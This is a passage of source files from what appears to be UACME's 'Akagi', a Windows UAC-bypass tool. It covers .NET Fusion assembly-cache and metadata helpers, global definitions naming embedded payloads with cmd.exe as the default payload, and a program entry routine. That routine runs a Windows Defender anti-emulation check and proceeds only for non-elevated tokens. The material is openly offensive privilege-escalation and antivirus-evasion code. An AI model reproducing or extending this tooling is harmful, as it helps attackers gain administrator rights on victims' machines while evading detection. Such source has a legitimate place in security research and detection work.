assembly name.\n*\n* Note: Use supHeapFree to release lpAssemblyName allocated memory.\n*\n*/\nHRESULT fusUtilGetAssemblyName(\n _In_ IAssemblyName* pInterface,\n _Inout_ LPWSTR* lpName,\n _Out_opt_ PSIZE_T pcchName,\n _Inout_opt_ LPWSTR* lpDisplayName,\n _Out_opt_ PSIZE_T pcchDisplayName\n)\n{\n DWORD cchName = 0;\n HRESULT hr;\n LPWSTR assemblyName = NULL, displayName = NULL;\n\n do {\n\n if (pcchName) *pcchName = 0;\n if (pcchDisplayName) *pcchDisplayName = 0;\n\n hr = pInterface->lpVtbl->GetName(pInterface, &cchName, NULL);\n if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))\n break;\n\n assemblyName = (LPWSTR)supHeapAlloc((cchName * sizeof(WCHAR)) + sizeof(UNICODE_NULL));\n if (assemblyName)\n hr = pInterface->lpVtbl->GetName(pInterface, &cchName, (LPOLESTR)assemblyName);\n else\n hr = E_OUTOFMEMORY;\n\n if (pcchName) {\n if (SUCCEEDED(hr))\n *pcchName = cchName;\n }\n\n cchName = 0;\n hr = pInterface->lpVtbl->GetDisplayName(pInterface, NULL, &cchName, 0);\n if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))\n break;\n\n displayName = (LPWSTR)supHeapAlloc((cchName * sizeof(WCHAR)) + sizeof(UNICODE_NULL));\n if (displayName)\n hr = pInterface->lpVtbl->GetDisplayName(pInterface, (LPOLESTR)displayName, &cchName, 0);\n else\n hr = E_OUTOFMEMORY;\n\n if (pcchDisplayName) {\n if (SUCCEEDED(hr))\n *pcchDisplayName = cchName;\n }\n\n } while (FALSE);\n\n *lpName = assemblyName;\n if (lpDisplayName)\n *lpDisplayName = displayName;\n\n return hr;\n}\n\n/*\n* fusUtilGetAssemblyMVIDFromZapCache\n*\n* Purpose:\n*\n* Query cache zap assembly mvid.\n*\n*/\nBOOL fusUtilGetAssemblyMVIDFromZapCache(\n _In_ LPCWSTR AssemblyName,\n _Inout_ GUID* ModuleVersionId\n)\n{\n BOOL bFound = FALSE, bResult = FALSE;\n HRESULT hr;\n IAssemblyEnum* asmEnum = NULL;\n IAssemblyName* asmName = NULL;\n LPWSTR lpAssemblyName = NULL;\n DWORD dwSize;\n\n do {\n\n hr = g_ctx->FusionContext.CreateAssemblyEnum(&asmEnum, NULL, NULL, ASM_CACHE_ZAP, NULL);\n if ((FAILED(hr)) || (asmEnum == NULL))\n break;\n\n //\n // Locate assembly and remember it name/display name.\n //\n while ((hr = asmEnum->lpVtbl->GetNextAssembly(asmEnum, NULL, &asmName, 0)) == S_OK) {\n\n if (SUCCEEDED(fusUtilGetAssemblyName(asmName,\n &lpAssemblyName,\n NULL,\n NULL,\n NULL)))\n {\n\n if (_strcmpi(AssemblyName, lpAssemblyName) == 0) {\n bFound = TRUE;\n break;\n }\n else {\n supHeapFree(lpAssemblyName);\n lpAssemblyName = NULL;\n }\n\n }\n\n asmName->lpVtbl->Finalize(asmName);\n asmName->lpVtbl->Release(asmName);\n }\n\n if (FAILED(hr) || bFound == FALSE)\n break;\n\n dwSize = 0;\n hr = asmName->lpVtbl->GetProperty(asmName, ASM_NAME_MVID, NULL, &dwSize);\n if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))\n break;\n\n if (dwSize != sizeof(GUID))\n break;\n\n hr = asmName->lpVtbl->GetProperty(asmName, ASM_NAME_MVID, ModuleVersionId, &dwSize);\n bResult = SUCCEEDED(hr);\n\n } while (FALSE);\n\n if (asmName) {\n asmName->lpVtbl->Finalize(asmName);\n asmName->lpVtbl->Release(asmName);\n }\n\n if (asmEnum)\n asmEnum->lpVtbl->Release(asmEnum);\n\n if (lpAssemblyName)\n supHeapFree(lpAssemblyName);\n\n return bResult;\n}\n\n/*\n* fusUtilGetAssemblyPath\n*\n* Purpose:\n*\n* Return given assembly file path.\n*\n* Note: Use supHeapFree to release lpAssemblyPath allocated memory.\n*\n*/\nHRESULT fusUtilGetAssemblyPath(\n _In_ IAssemblyCache* pInterface,\n _In_ LPCWSTR lpAssemblyName,\n _Inout_ LPCWSTR* lpAssemblyPath\n)\n{\n HRESULT hr = E_FAIL;\n ASSEMBLY_INFO asmInfo;\n LPWSTR assemblyPath;\n\n *lpAssemblyPath = NULL;\n\n RtlSecureZeroMemory(&asmInfo, sizeof(asmInfo));\n\n pInterface->lpVtbl->QueryAssemblyInfo(pInterface,\n QUERYASMINFO_FLAG_GETSIZE,\n lpAssemblyName,\n &asmInfo);\n\n if (asmInfo.cchBuf == 0) //empty pszCurrentAssemblyPathBuf\n return E_FAIL;\n\n assemblyPath = (LPWSTR)supHeapAlloc(asmInfo.cchBuf * sizeof(WCHAR));\n if (assemblyPath == NULL)\n return E_FAIL;\n\n asmInfo.pszCurrentAssemblyPathBuf = assemblyPath;\n\n hr = pInterface->lpVtbl->QueryAssemblyInfo(pInterface,\n QUERYASMINFO_FLAG_VALIDATE,\n lpAssemblyName,\n &asmInfo);\n\n if (!SUCCEEDED(hr)) {\n supHeapFree(asmInfo.pszCurrentAssemblyPathBuf);\n }\n else {\n *lpAssemblyPath = assemblyPath;\n }\n\n return hr;\n}\n\n/*\n* fusUtilGetAssemblyPathByName\n*\n* Purpose:\n*\n* Return given assembly file path.\n*\n* Note: Use supHeapFree to release lpAssemblyPath allocated memory.\n*\n*/\nBOOLEAN fusUtilGetAssemblyPathByName(\n _In_ LPWSTR lpAssemblyName,\n _Inout_ LPWSTR* lpAssemblyPath\n)\n{\n HRESULT hr;\n IAssemblyCache* asmCache = NULL;\n\n do {\n\n hr = g_ctx->FusionContext.CreateAssemblyCache(&asmCache, 0);\n if ((FAILED(hr)) || (asmCache == NULL))\n break;\n\n hr = fusUtilGetAssemblyPath(asmCache,\n lpAssemblyName,\n lpAssemblyPath);\n\n asmCache->lpVtbl->Release(asmCache);\n\n } while (FALSE);\n\n return SUCCEEDED(hr);\n}\n\n/*\n* fusUtilReferenceStreamByName\n*\n* Purpose:\n*\n* Query stream pointer by stream name.\n*\n*/\nBOOL fusUtilReferenceStreamByName(\n _In_ STORAGEHEADER* StorageHeader,\n _In_ LPCSTR StreamName,\n _Out_ PSTORAGESTREAM* StreamRef\n)\n{\n WORD i;\n PBYTE streamPtr;\n STORAGESTREAM* pStorStream;\n ULONG offset;\n SIZE_T nameLen;\n\n *StreamRef = NULL;\n\n streamPtr = (PBYTE)RtlOffsetToPointer(StorageHeader, sizeof(STORAGEHEADER));\n\n i = 0;\n\n do {\n pStorStream = (STORAGESTREAM*)streamPtr;\n if (IsBadReadPtr(pStorStream->rcName, sizeof(CHAR)))\n return FALSE;\n\n if (_strcmpi_a(pStorStream->rcName, StreamName) == 0) {\n *StreamRef = pStorStream;\n return TRUE;\n }\n\n nameLen = _strlen_a(pStorStream->rcName) + 1;\n if (nameLen > MAXUSHORT)\n return FALSE;\n\n offset = ALIGN_UP(FIELD_OFFSET(STORAGESTREAM, rcName) + nameLen, ULONG);\n streamPtr = (PBYTE)RtlOffsetToPointer(streamPtr, offset);\n i++;\n\n } while (i < StorageHeader->iStreams);\n\n return FALSE;\n}\n\n/*\n* fusUtilGetImageMVID\n*\n* Purpose:\n*\n* Query MVID value from image metadata.\n*\n* Ref: https://www.ntcore.com/files/dotnetformat.htm\n*\n*/\nBOOL fusUtilGetImageMVID(\n _In_ LPCWSTR lpImageName,\n _Out_ GUID* ModuleVersionId\n)\n{\n BOOL bResult = FALSE;\n HMODULE hModule;\n PVOID baseAddress;\n IMAGE_COR20_HEADER* cliHeader;\n ULONG sz, offset, mvidIndex, i;\n\n STORAGESIGNATURE* pStorSign;\n STORAGEHEADER* pStorHeader;\n STORAGESTREAM* pStreamGuid;\n STORAGESTREAM* pStreamTables;\n STORAGETABLESHEADER* pTablesHeader;\n\n PBYTE tablesPtr;\n LPGUID guidsPtr;\n\n RPC_STATUS st;\n\n st = UuidCreateNil(ModuleVersionId);\n if (st != S_OK)\n return FALSE;\n\n hModule = LoadLibraryEx(lpImageName, NULL, LOAD_LIBRARY_AS_IMAGE_RESOURCE);\n if (hModule) {\n\n baseAddress = (PBYTE)(((ULONG_PTR)hModule) & ~3);\n\n cliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(baseAddress, TRUE,\n IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);\n\n if (cliHeader && sz >= sizeof(IMAGE_COR20_HEADER)) {\n\n pStorSign = (STORAGESIGNATURE*)RtlOffsetToPointer(baseAddress, cliHeader->MetaData.VirtualAddress);\n if (pStorSign && !IsBadReadPtr(pStorSign, sizeof(STORAGESIGNATURE)) &&\n pStorSign->lSignature == STORAGE_MAGIC_SIG)\n {\n offset = FIELD_OFFSET(STORAGESIGNATURE, pVersion) + pStorSign->iVersionString;\n pStorHeader = (STORAGEHEADER*)RtlOffsetToPointer(pStorSign, offset);\n\n pStreamTables = NULL;\n if (!fusUtilReferenceStreamByName(pStorHeader, \"#~\", &pStreamTables)) {\n FreeLibrary(hModule);\n return FALSE;\n }\n\n pStreamGuid = NULL;\n if (!fusUtilReferenceStreamByName(pStorHeader, \"#GUID\", &pStreamGuid)) {\n FreeLibrary(hModule);\n return FALSE;\n }\n\n pTablesHeader = (STORAGETABLESHEADER*)RtlOffsetToPointer(pStorSign, pStreamTables->iOffset);\n sz = 0;\n\n //\n // __popcnt64 or the garbage code below\n //\n for (i = 0; i < MAX_CLR_TABLES; i++)\n if ((i < 32 && (pTablesHeader->Valid.u.LowPart >> i) & 1) ||\n (i >= 32 && (pTablesHeader->Valid.u.HighPart >> i) & 1))\n {\n sz++;\n }\n\n offset = FIELD_OFFSET(STORAGETABLESHEADER, Rows) + (sz * sizeof(ULONG));\n\n tablesPtr = (PBYTE)RtlOffsetToPointer(pTablesHeader, offset);\n tablesPtr += sizeof(WORD);\n\n if (pTablesHeader->HeapOffsetSizes & MD_STRINGS_BIT)\n tablesPtr += sizeof(DWORD);\n else\n tablesPtr += sizeof(WORD);\n\n if (pTablesHeader->HeapOffsetSizes & MD_GUIDS_BIT)\n mvidIndex = *(PULONG)tablesPtr;\n else\n mvidIndex = *(PUSHORT)tablesPtr;\n\n if (mvidIndex) {\n guidsPtr = (LPGUID)RtlOffsetToPointer(pStorSign, pStreamGuid->iOffset);\n RtlCopyMemory(ModuleVersionId, &guidsPtr[mvidIndex - 1], sizeof(GUID));\n bResult = TRUE;\n }\n }\n }\n FreeLibrary(hModule);\n }\n\n return bResult;\n}\n\n\n/*\n* fusUtilpFusionScanFiles\n*\n* Purpose:\n*\n* Scan directory for files of given type.\n*\n* Note:\n* Return TRUE to abort further scan, FALSE otherwise.\n*\n*/\nBOOL fusUtilpFusionScanFiles(\n _In_ LPWSTR lpDirectory,\n _In_ LPWSTR lpExtension,\n _In_ pfnFusionScanFilesCallback pfnCallback,\n _In_opt_ PVOID pvUserContext\n)\n{\n BOOL bResult = FALSE;\n HANDLE hFile;\n LPWSTR lpLookupDirectory = NULL;\n SIZE_T cchBuffer;\n WIN32_FIND_DATA fdata;\n\n //\n // Allocate buffer for path to the file including backslash and terminating null.\n //\n cchBuffer = (2 + _strlen(lpDirectory) + _strlen(lpExtension));\n lpLookupDirectory = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));\n if (lpLookupDirectory) {\n\n _strcpy(lpLookupDirectory, lpDirectory);\n supConcatenatePaths(lpLookupDirectory, lpExtension, cchBuffer);\n\n hFile = FindFirstFile(lpLookupDirectory, &fdata);\n if (hFile != INVALID_HANDLE_VALUE) {\n do {\n\n if (pfnCallback(lpDirectory, &fdata, pvUserContext)) {\n bResult = TRUE;\n break;\n }\n\n } while (FindNextFile(hFile, &fdata));\n FindClose(hFile);\n }\n supHeapFree(lpLookupDirectory);\n }\n\n return bResult;\n}\n\n/*\n* fusUtilScanDirectory\n*\n* Purpose:\n*\n* Recursively scan directories looking for files with given extension.\n*\n*/\nBOOL fusUtilScanDirectory(\n _In_ LPWSTR lpDirectory,\n _In_ LPWSTR lpExtension,\n _In_ pfnFusionScanFilesCallback pfnCallback,\n _In_opt_ PVOID pvUserContext\n)\n{\n BOOL bResult = FALSE;\n SIZE_T cchBuffer;\n HANDLE hDirectory;\n LPWSTR lpFilePath;\n WIN32_FIND_DATA fdata;\n\n if (fusUtilpFusionScanFiles(lpDirectory, lpExtension, pfnCallback, pvUserContext))\n return TRUE;\n\n //\n // Allocate buffer for path including backslash, search mask, terminating null and space for filename.\n //\n cchBuffer = 4 + MAX_PATH + _strlen(lpDirectory);\n lpFilePath = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));\n if (lpFilePath == NULL)\n return FALSE;\n\n _strcpy(lpFilePath, lpDirectory);\n supConcatenatePaths(lpFilePath, TEXT(\"*\"), cchBuffer);\n\n hDirectory = FindFirstFile(lpFilePath, &fdata);\n if (hDirectory != INVALID_HANDLE_VALUE) {\n do {\n if ((fdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&\n (fdata.cFileName[0] != L'.')\n )\n {\n _strcpy(lpFilePath, lpDirectory);\n _strcat(lpFilePath, fdata.cFileName);\n\n bResult = fusUtilScanDirectory(lpFilePath,\n lpExtension,\n pfnCallback,\n pvUserContext);\n\n if (bResult)\n break;\n\n }\n } while (FindNextFile(hDirectory, &fdata));\n FindClose(hDirectory);\n }\n\n supHeapFree(lpFilePath);\n\n return bResult;\n}\n\n/*\n* fusUtilFindFileByMVIDCallback\n*\n* Purpose:\n*\n* supFusionScanDirectory callback for MVID comparison.\n*\n*/\nBOOL fusUtilFindFileByMVIDCallback(\n _In_ LPWSTR CurrentDirectory,\n _In_ WIN32_FIND_DATA* FindData,\n _In_ PVOID UserContext\n)\n{\n FUSION_SCAN_PARAM* ScanParam = (FUSION_SCAN_PARAM*)UserContext;\n LPWSTR lpFileName;\n SIZE_T cchBuffer;\n GUID mVid;\n RPC_STATUS rpcStatus;\n\n cchBuffer = 2 + MAX_PATH + _strlen(CurrentDirectory);\n lpFileName = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));\n if (lpFileName) {\n\n _strcpy(lpFileName, CurrentDirectory);\n supConcatenatePaths(lpFileName, FindData->cFileName, cchBuffer);\n\n if (fusUtilGetImageMVID(lpFileName, &mVid)) {\n\n if (0 == UuidCompare(ScanParam->ReferenceMVID,\n &mVid,\n &rpcStatus))\n {\n ScanParam->lpFileName = lpFileName;\n return TRUE;\n }\n }\n\n supHeapFree(lpFileName);\n }\n return FALSE;\n}\n\n#define NI_DLL_EXT L\".ni.dll\"\n#define NI_DLL_AUX_EXT L\".ni.dll.aux\"\n\n/*\n* fusUtilCombineNativeImageCacheName\n*\n* Purpose:\n*\n* Build cache image name from assembly name.\n*\n*/\nVOID fusUtilCombineNativeImageCacheName(\n _In_ LPCWSTR lpAssemblyName,\n _Inout_ LPWSTR lpNativeImageName,\n _In_ DWORD cchNativeName,\n _In_ BOOLEAN fIsAux\n)\n{\n supConcatenatePaths(lpNativeImageName, lpAssemblyName, cchNativeName);\n\n if (fIsAux) {\n _strcat(lpNativeImageName, NI_DLL_AUX_EXT);\n }\n else {\n _strcat(lpNativeImageName, NI_DLL_EXT);\n }\n\n}\n"
},
{
"path": "Source/Akagi/fusutil.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2020 - 2021\n*\n* TITLE: FUSUTIL.H\n*\n* VERSION: 3.58\n*\n* DATE: 01 Dec 2021\n*\n* Common header file for the Windows Fusion support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n\n//\n// Fusion CLI metadata structures\n//\ntypedef struct _STORAGESIGNATURE {\n ULONG lSignature; // \"Magic\" signature.\n USHORT iMajorVer; // Major file version.\n USHORT iMinorVer; // Minor file version.\n ULONG iExtraData; // Offset to next structure of information \n ULONG iVersionString; // Length of version string\n BYTE pVersion[ANYSIZE_ARRAY]; // Version string\n} STORAGESIGNATURE, * PSTORAGESIGNATURE;\n\ntypedef struct _STORAGEHEADER {\n BYTE fFlags; // STGHDR_xxx flags.\n BYTE pad;\n USHORT iStreams; // How many streams are there.\n} STORAGEHEADER, * PSTORAGEHEADER;\n\n#define MAXSTREAMNAME 32\n\ntypedef struct _STORAGESTREAM {\n ULONG iOffset; // Offset in file for this stream.\n ULONG iSize; // Size of the file.\n CHAR rcName[MAXSTREAMNAME];\n} STORAGESTREAM, * PSTORAGESTREAM;\n\n#include \ntypedef struct _STORAGETABLESHEADER {\n DWORD Reserved0;\n BYTE MajorVersion;\n BYTE MinorVersion;\n BYTE HeapOffsetSizes;\n BYTE Reserved1;\n ULARGE_INTEGER Valid;\n ULARGE_INTEGER Sorted;\n ULONG Rows[ANYSIZE_ARRAY];\n} STORAGETABLESHEADER, * PSTORAGETABLESHEADER;\n#include \n\n#define STORAGE_MAGIC_SIG 0x424A5342 // BSJB\n\n#define MD_STRINGS_BIT 0x1\n#define MD_GUIDS_BIT 0x2\n#define MD_BLOBS_BIT 0x4\n#define MAX_CLR_TABLES 64\n\n//\n// Fusion metadata end\n//\n\n//\n// Assembly cache scan routine and definitions.\n//\ntypedef HRESULT(WINAPI* pfnCreateAssemblyEnum)(\n _Out_ IAssemblyEnum** pEnum,\n _In_opt_ IUnknown* pUnkReserved,\n _In_opt_ IAssemblyName* pName,\n _In_ DWORD dwFlags,\n _Reserved_ LPVOID pvReserved);\n\ntypedef HRESULT(WINAPI* pfnCreateAssemblyCache)(\n _Out_ IAssemblyCache** ppAsmCache,\n _In_ DWORD dwReserved);\n\ntypedef struct _FUSION_SCAN_PARAM {\n _In_ GUID* ReferenceMVID;\n _Out_ LPWSTR lpFileName;\n} FUSION_SCAN_PARAM, * PFUSION_SCAN_PARAM;\n\ntypedef BOOL(CALLBACK* pfnFusionScanFilesCallback)(\n LPWSTR CurrentDirectory,\n WIN32_FIND_DATA* FindData,\n PVOID UserContext);\n\ntypedef struct _UACME_FUSION_CONTEXT {\n BOOL Initialized;\n HINSTANCE hFusion;\n pfnCreateAssemblyCache CreateAssemblyCache;\n pfnCreateAssemblyEnum CreateAssemblyEnum;\n} UACME_FUSION_CONTEXT, * PUACME_FUSION_CONTEXT;\n\nBOOLEAN fusUtilInitFusion(\n _In_ DWORD dwVersion);\n\nVOID fusUtilBinToUnicodeHex(\n _In_ const BYTE* pSrc,\n _In_ UINT cSrc,\n _Out_cap_(2 * cSrc + 1) LPWSTR pDst);\n\nHRESULT fusUtilGetAssemblyName(\n _In_ IAssemblyName* pInterface,\n _Inout_ LPWSTR* lpName,\n _Out_opt_ PSIZE_T pcchName,\n _Inout_opt_ LPWSTR* lpDisplayName,\n _Out_opt_ PSIZE_T pcchDisplayName);\n\nBOOL fusUtilGetAssemblyMVIDFromZapCache(\n _In_ LPCWSTR AssemblyName,\n _Inout_ GUID* ModuleVersionId);\n\nHRESULT fusUtilGetAssemblyPath(\n _In_ IAssemblyCache* pInterface,\n _In_ LPCWSTR lpAssemblyName,\n _Inout_ LPCWSTR* lpAssemblyPath);\n\nBOOLEAN fusUtilGetAssemblyPathByName(\n _In_ LPWSTR lpAssemblyName,\n _Inout_ LPWSTR* lpAssemblyPath);\n\nBOOL fusUtilReferenceStreamByName(\n _In_ STORAGEHEADER* StorageHeader,\n _In_ LPCSTR StreamName,\n _Out_ PSTORAGESTREAM* StreamRef);\n\nBOOL fusUtilGetImageMVID(\n _In_ LPCWSTR lpImageName,\n _Out_ GUID* ModuleVersionId);\n\nBOOL fusUtilFindFileByMVIDCallback(\n _In_ LPWSTR CurrentDirectory,\n _In_ WIN32_FIND_DATA* FindData,\n _In_ PVOID UserContext);\n\nBOOL fusUtilScanDirectory(\n _In_ LPWSTR lpDirectory,\n _In_ LPWSTR lpExtension,\n _In_ pfnFusionScanFilesCallback pfnCallback,\n _In_opt_ PVOID pvUserContext);\n\nVOID fusUtilCombineNativeImageCacheName(\n _In_ LPCWSTR lpAssemblyName,\n _Inout_ LPWSTR lpNativeImageName,\n _In_ DWORD cchNativeName,\n _In_ BOOLEAN fIsAux);\n"
},
{
"path": "Source/Akagi/global.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2023\n*\n* TITLE: GLOBAL.H\n*\n* VERSION: 3.65\n*\n* DATE: 22 Sep 2023\n*\n* Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\libinc.h\"\n\n//disable nonmeaningful warnings.\n#pragma warning(disable: 4005) // macro redefinition\n#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 6102) // Using %s from failed function call at line %u\n#pragma warning(disable: 6258) // Using TerminateThread does not allow proper thread clean up\n#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER\n#pragma warning(disable: 6255 6263) // alloca\n#pragma warning(disable: 28159)\n\n#define PAYLOAD_ID_NONE MAXDWORD\n\n#define SECRETS_ID IDR_SECRETS\n\n#ifdef _WIN64\n#include \"bin64res.h\"\n#define FUBUKI_ID IDR_FUBUKI64\n#define AKATSUKI_ID IDR_AKATSUKI64\n#define FUBUKI32_ID IDR_FUBUKI32\n#define FUBUKI64_ID IDR_FUBUKI64\n#define KAMIKAZE_ID IDR_KAMIKAZE\n#else\n#include \"bin32res.h\"\n#define FUBUKI_ID IDR_FUBUKI32\n#define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit\n#define FUBUKI32_ID IDR_FUBUKI32\n#define KAMIKAZE_ID IDR_KAMIKAZE\n#endif\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#define SECURITY_WIN32\n#include \n\n#pragma comment(lib, \"taskschd.lib\")\n#pragma comment(lib, \"rpcrt4.lib\")\n#pragma comment (lib, \"Secur32.lib\")\n\n#pragma warning(push)\n#pragma warning(disable: 4115) //named type definition in parentheses\n#include \n#pragma warning(pop)\n\n#include \"shared\\hde\\hde64.h\"\n#include \"shared\\ntos\\ntos.h\"\n#include \"shared\\ntos\\ntbuilds.h\"\n#include \"shared\\minirtl.h\"\n#include \"shared\\cmdline.h\"\n#include \"shared\\_filename.h\"\n#include \"shared\\ldr.h\"\n#include \"shared\\windefend.h\"\n#include \"shared\\consts.h\"\n#include \"sup.h\"\n#include \"fusutil.h\"\n#include \"compress.h\"\n#include \"aic.h\"\n#include \"stub.h\"\n#include \"console.h\"\n#include \"methods\\methods.h\"\n\n//default execution flow\n#define AKAGI_FLAG_KILO 1\n\n//suppress all additional output\n#define AKAGI_FLAG_TANGO 2\n\ntypedef struct _UACME_SHARED_CONTEXT {\n HANDLE hIsolatedNamespace;\n HANDLE hSharedSection;\n HANDLE hCompletionEvent;\n} UACME_SHARED_CONTEXT, *PUACME_SHARED_CONTEXT;\n\ntypedef struct _UACME_CONTEXT {\n BOOLEAN IsWow64;\n ULONG Cookie;\n ULONG dwBuildNumber;\n ULONG AkagiFlag;\n ULONG IFileOperationFlags;\n\n // Count of characters\n ULONG OptionalParameterLength; \n\n PVOID ucmHeap;\n pfnDecompressPayload DecompressRoutine;\n pswprintf_s swprintf_s;\n \n UACME_FUSION_CONTEXT FusionContext;\n UACME_SHARED_CONTEXT SharedContext;\n\n // Windows directory with end slash\n WCHAR szSystemRoot[MAX_PATH + 1];\n\n // Windows\\System32 directory with end slash\n WCHAR szSystemDirectory[MAX_PATH + 1];\n\n // Current user temp directory with end slash\n WCHAR szTempDirectory[MAX_PATH + 1];\n\n // Current program directory with end slash\n WCHAR szCurrentDirectory[MAX_PATH + 1];\n\n // Optional parameter, limited to MAX_PATH\n WCHAR szOptionalParameter[MAX_PATH + 1]; \n\n // Default payload (system32\\cmd.exe), limited to MAX_PATH\n WCHAR szDefaultPayload[MAX_PATH + 1]; \n} UACMECONTEXT, *PUACMECONTEXT;\n\ntypedef struct _UACME_PARAM_BLOCK {\n ULONG Crc32;\n ULONG SessionId;\n ULONG AkagiFlag;\n WCHAR szParameter[MAX_PATH + 1];\n WCHAR szDesktop[MAX_PATH + 1];\n WCHAR szWinstation[MAX_PATH + 1];\n WCHAR szSignalObject[MAX_PATH + 1];\n} UACME_PARAM_BLOCK, *PUACME_PARAM_BLOCK;\n\ntypedef UINT(WINAPI *pfnEntryPoint)(\n _In_ UCM_METHOD Method,\n _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n _In_ ULONG OptionalParameterLength\n );\n\ntypedef struct _UACME_THREAD_CONTEXT {\n TEB_ACTIVE_FRAME Frame;\n pfnEntryPoint ucmMain;\n DWORD ReturnedResult;\n ULONG OptionalParameterLength;\n LPWSTR OptionalParameter;\n} UACME_THREAD_CONTEXT, * PUACME_THREAD_CONTEXT;\n\nextern PUACMECONTEXT g_ctx;\nextern HINSTANCE g_hInstance;\n"
},
{
"path": "Source/Akagi/main.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2022\n*\n* TITLE: MAIN.C\n*\n* VERSION: 3.61\n*\n* DATE: 22 Jun 2022\n*\n* Program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#define OEMRESOURCE\n#include \"global.h\"\n#pragma comment(lib, \"comctl32.lib\")\n\n//Runtime context global variable\nPUACMECONTEXT g_ctx;\n\n//Image Base Address global variable\nHINSTANCE g_hInstance;\n\n/*\n* ucmInit\n*\n* Purpose:\n*\n* Prestart phase with MSE / Windows Defender anti-emulation part.\n*\n* Note:\n*\n* supHeapAlloc unavailable during this routine and calls from it.\n*\n*/\nNTSTATUS ucmInit(\n _Inout_ UCM_METHOD *RunMethod,\n _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n _In_ ULONG OptionalParameterLength\n)\n{\n UCM_METHOD Method;\n LPWSTR optionalParameter = NULL;\n ULONG optionalParameterLength = 0;\n\n#ifndef _DEBUG\n TOKEN_ELEVATION_TYPE ElevType;\n#endif\t\n\n ULONG bytesIO;\n WCHAR szBuffer[MAX_PATH + 1];\n\n wdCheckEmulatedVFS();\n\n ucmConsoleInit();\n\n bytesIO = 0;\n RtlQueryElevationFlags(&bytesIO);\n if ((bytesIO & DBG_FLAG_ELEVATION_ENABLED) == 0)\n return STATUS_ELEVATION_REQUIRED;\n\n if (FAILED(CoInitializeEx(NULL, COINIT_APARTMENTTHREADED)))\n return STATUS_INTERNAL_ERROR;\n\n InitCommonControls();\n\n if (g_hInstance == NULL)\n g_hInstance = (HINSTANCE)NtCurrentPeb()->ImageBaseAddress;\n\n if (*RunMethod == UacMethodInvalid) {\n\n bytesIO = 0;\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);\n if (bytesIO == 0) {\n return STATUS_INVALID_PARAMETER;\n }\n\n Method = (UCM_METHOD)_strtoul(szBuffer);\n *RunMethod = Method;\n\n }\n else {\n Method = *RunMethod;\n }\n\n#ifndef _DEBUG\n if (Method == UacMethodTest)\n return STATUS_INVALID_PARAMETER;\n#endif\n if (Method >= UacMethodMax)\n return STATUS_INVALID_PARAMETER;\n\n#ifndef _DEBUG\n ElevType = TokenElevationTypeDefault;\n if (supGetElevationType(&ElevType)) {\n if (ElevType != TokenElevationTypeLimited) {\n return STATUS_NOT_SUPPORTED;\n }\n }\n else {\n return STATUS_INTERNAL_ERROR;\n }\n#endif\n\n //\n // Process optional parameter.\n //\n if ((OptionalParameter == NULL) || (OptionalParameterLength == 0)) {\n\n RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n bytesIO = 0;\n GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &bytesIO);\n if (bytesIO > 0) {\n optionalParameter = (LPWSTR)&szBuffer;\n optionalParameterLength = bytesIO;\n }\n\n }\n else {\n optionalParameter = OptionalParameter;\n optionalParameterLength = OptionalParameterLength;\n }\n\n g_ctx = (PUACMECONTEXT)supCreateUacmeContext(Method,\n optionalParameter,\n optionalParameterLength,\n supEncodePointer(DecompressPayload));\n\n if (g_ctx == NULL)\n return STATUS_FATAL_APP_EXIT;\n\n return STATUS_SUCCESS;\n}\n\n/*\n* ucmMain\n*\n* Purpose:\n*\n* Program entry point.\n*\n*/\nNTSTATUS WINAPI ucmMain(\n _In_ UCM_METHOD Method,\n _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n _In_ ULONG OptionalParameterLength\n)\n{\n NTSTATUS Status;\n UCM_METHOD method = Method;\n\n Status = ucmInit(&method,\n OptionalParameter,\n OptionalParameterLength);\n\n ucmConsolePrintStatus(TEXT(\"[*] ucmInit\"), 